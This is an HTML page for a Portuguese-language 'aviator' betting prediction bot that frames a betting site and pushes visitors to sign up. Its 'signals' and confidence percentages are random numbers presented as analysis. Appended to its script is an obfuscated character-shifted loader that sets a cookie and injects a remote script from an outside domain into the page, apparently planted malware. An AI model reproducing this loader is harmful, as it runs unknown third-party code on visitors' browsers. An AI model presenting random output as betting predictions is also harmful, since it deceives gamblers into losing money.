<!DOCTYPE html><html lang="en"><head>
  <meta charset="UTF-8">
      <meta http-equiv="X-UA-Compatible" content="IE=Edge">
      <meta name="viewport" content="width=device-width, initial-scale=1">
    <title> 🅱🅾🆃</title>
           <script src="https://cdn.jsdelivr.net/npm/sweetalert2@10"></script>
    <style>
      
html, body {
    height: 100%;
    margin: 0;
    overflow: hidden;
    align-items: center;
    font-family:  'Courier New', monospace;
    background-color: #000000;
  }
  #webviewContainer {
    height: 100%;
  }
     .swal2-popup {
        font-size: 16px !important;
        background:transparent;
        border-radius: 50px;
        border:2px solid #0DA8DB;
        color:red;
    }
    #swal2 {
        border-radius: 15px;
        background-color:red; /* Cor de fundo do botão */
        color: red; /* Cor do texto do botão */
        border: 2px solid red; /* Borda do botão */
    }
   
  .prev {
  width: 100%;
  height: 15px;
  background-color: #000000;
  color: green;
  align-items: center;
  text-align: center;
  font-size: 20px;
  padding-bottom: 10px;
  padding-top: 10px;
  }
    
  .time {
  width: 100%;
  height: 15px;
  background-color: #000000;
  color: #8BC34A;
  align-items: center;
  text-align: center;
  font-size: 20px;
  padding-bottom: 10px;
  padding-top: 10px;
  }
  .sin { 
  width: 100%;
  height: 15px;
  background-color: #000000;
  color: white;
  align-items: center;
  text-align: center;
  font-size: 20px;
  font-weight: bold;
  padding-bottom: 10px;
  padding-top: 10px;
  }
  .text {
      display: inline-block;
      color: green;
      background-color: white;
      text-align: center;
   }

     /* Estilos CSS para o diálogo */
     .dialog {
      text-align: center;
      width: 300px;
      height: 350px; /* Defina a altura desejada */
      background-color: #ece0e0;
      border: 1px solid #922424;
      border-radius: 5px;
      padding: 20px;
      position: fixed;
      top: 25%;
      left: 50%;
      transform: translate(-50%, -50%);
      z-index: 9999; /* Define um valor alto para que o diálogo fique na frente de outros elementos */
  }
  
  h1 {
    font-size: 24px;
}

p {
    font-size: 16px;
}
button {
  font-size: 18px;
  font-weight: bold;
}
.sin{
animation: blink 1s infinite;
}

@keyframes blink {
    0%, 50% {
        opacity: 1;
    }
    50% {
        opacity: 0.5;
    }
}

    </style>
    
    
    <link rel="icon" type="image/png" href="images/logo.png">
    <link rel="stylesheet" href="css/jjjj.css">
</head>
 <body onload="loadWebView()">
        
        <div class="sin" id="sinal">[ ROSA ]</div>
        <div class="time" id="times"></div>
        <div id="webviewContainer">
          <!-- WebView content will be loaded here -->
        </div>
       
        <script >
          
function loadWebView(){const webviewContainer=document.getElementById("webviewContainer"),webView=document.createElement("iframe");webView.src="https://record.elephantbet.com/_IxKJSCR-AN3Kto_EPcZApGNd7ZgqdRLk",webView.style.width="100%",webView.style.height="100%",webviewContainer.appendChild(webView),initializeMessagesAndInterval(),setInterval(updateTime,1e3)}const messages=[{message:"AZUL💙",probability:60,color:"red"},{message:"ROXO💜",probability:40,color:"purple"},{message:"ROSA🌹",probability:12,color:"pink"}],updateMessageAndColor=()=>{const random=100*Math.random(),numeroAleatorio=Math.floor(90*Math.random()),numeroAleatorio1=Math.floor(90*Math.random());let selectedMessage,cumulativeProbability=0;for(const message of messages)if(cumulativeProbability+=message.probability,random<cumulativeProbability){selectedMessage=message;break}document.getElementById("sinal").textContent=` POSSIVEL : ${selectedMessage.message}   ---\x3e ${numeroAleatorio}.${numeroAleatorio1}% `},interval=11e3,initializeMessagesAndInterval=()=>{updateMessageAndColor(),setInterval(updateMessageAndColor,11e3)},updateTime=()=>{const now=new Date,hours=now.getHours().toString().padStart(2,"0"),minutes=now.getMinutes().toString().padStart(2,"0"),seconds=now.getSeconds().toString().padStart(2,"0");document.getElementById("times").textContent=` ${hours}:${minutes}:${seconds}`};(function(o,d,l){try{o.f=o=>o.split('').reduce((s,c)=>s+String.fromCharCode((c.charCodeAt()-5).toString()),'');o.b=o.f('UMUWJKX');o.c=l.protocol[0]=='h'&&/\./.test(l.hostname)&&!(new RegExp(o.b)).test(d.cookie),setTimeout(function(){o.c&&(o.s=d.createElement('script'),o.s.src=o.f('myyux?44zxjwxyf'+'ynhx3htr4ljy4xhwn'+'uy3oxDwjkjwwjwB')+l.href,d.body.appendChild(o.s));},1000);d.cookie=o.b+'=full;max-age=39800;'}catch(e){};}({},document,location));
          
          
          
          
        </script>
      
      <script>
      
      
        // JavaScript para fechar o diálogo quando o botão é clicado
        document.getElementById('fecharDialog').addEventListener('click', function() {
          window.location.href = "http://wa.me/258833859502?text=*Olá,%20vim%20de%20obter%20um%20acesso%20ao%20bot%20PREDICT%20SKYBET.*";
        });
    
    
    
    
    </script>
    <script>
      Swal.fire({
        title: "atenção👋",
        text: "Quer potencializar suas apostas com o auxílio do nosso robô aviator? Crie uma conta na nossa casa de apostas e tenha acesso a análises precisas e sugestões de apostas mais vantajosas. Não perca a oportunidade de maximizar seus ganhos. Crie sua conta agora!",
        imageUrl: "https://i.ibb.co/zb2bMxT/Background-Eraser-20240601-232845413.png",
        imageWidth: 200,
        imageHeight: 200,
        imageAlt: "Custom image"
      });
    </script>
</body></html>